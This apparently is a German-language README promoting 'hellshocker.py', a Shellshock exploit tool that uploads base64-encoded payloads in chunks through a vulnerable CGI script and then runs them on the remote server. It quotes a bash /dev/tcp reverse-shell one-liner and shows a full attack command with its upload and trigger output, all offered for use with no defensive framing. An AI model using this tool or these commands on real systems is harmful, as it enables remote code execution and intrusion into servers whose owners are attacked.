
Shellshock-Exploit-Skript, das aufgrund seiner Vielseitigkeit in der Lage ist, über beliebige Vektoren hochzuladen und RCE auszuführen.
Müde von schwachen Shellshock-Exploits oder einfach nur "/bin/bash >& /dev/tcp/IP/port 0>&1" in den Server zu gelangen?
Ja, du musst etwas Komplexeres auf den Server hochladen und ausführen, und das Base64-Kodieren einer riesigen Datei ist unmöglich, damit deine HTTP-Anfrage vom Webserver akzeptiert wird.
Deine Probleme könnten mit diesem Tool ein Ende haben. Es kann dein Payload in Base64 kodieren und in Blöcken von (standardmäßig) 128 Bytes an den Webserver senden. Nachdem es gesendet wurde, wird es decodiert und ausgeführt.
"Wow", sagst du, "Aber ich habe kein PHP, ich brauche etwas für Java." Kein Problem, sage ich, dieses Tool ist hochgradig anpassbar.
Schau dir das an:
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.
Dann wurde dein Payload erfolgreich übertragen und ausgeführt. Cool, oder? Ja, das ist es.